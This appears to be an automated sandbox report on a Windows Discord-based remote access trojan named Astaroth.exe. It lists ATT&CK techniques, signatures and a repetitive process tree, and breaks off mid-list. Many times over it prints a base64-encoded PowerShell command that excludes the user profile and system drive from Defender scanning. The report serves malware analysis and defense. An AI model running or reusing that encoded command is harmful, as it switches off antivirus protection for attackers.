Malware Analysis Report

2024-09-11 09:19

Sample ID 240616-cyldkazcpq
Target Astaroth.exe
SHA256 893092b2ad575827e3e4141319c95e950a8cf603a2327463c58589c98a2f199d
Tags
discordrat execution persistence rat rootkit stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

893092b2ad575827e3e4141319c95e950a8cf603a2327463c58589c98a2f199d

Threat Level: Known bad

The file Astaroth.exe was found to be: Known bad.

Malicious Activity Summary

discordrat execution persistence rat rootkit stealer

Discord RAT

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-16 02:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-16 02:29

Reported

2024-06-16 02:32

Platform

win11-20240611-en

Max time kernel

1s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

Signatures

Discord RAT

stealer rootkit rat persistence discordrat

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\system.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\system.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\system.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4992 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 4992 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 4992 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
PID 4992 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
PID 4992 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
PID 3584 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 3584 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 3584 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
PID 3584 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
PID 3584 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
PID 3712 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3712 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3712 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3712 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 3712 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 3712 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\System32\Conhost.exe
PID 3712 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\System32\Conhost.exe
PID 3712 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\System32\Conhost.exe
PID 5016 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5016 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5016 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5016 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 5016 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 5016 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 5016 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 5016 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

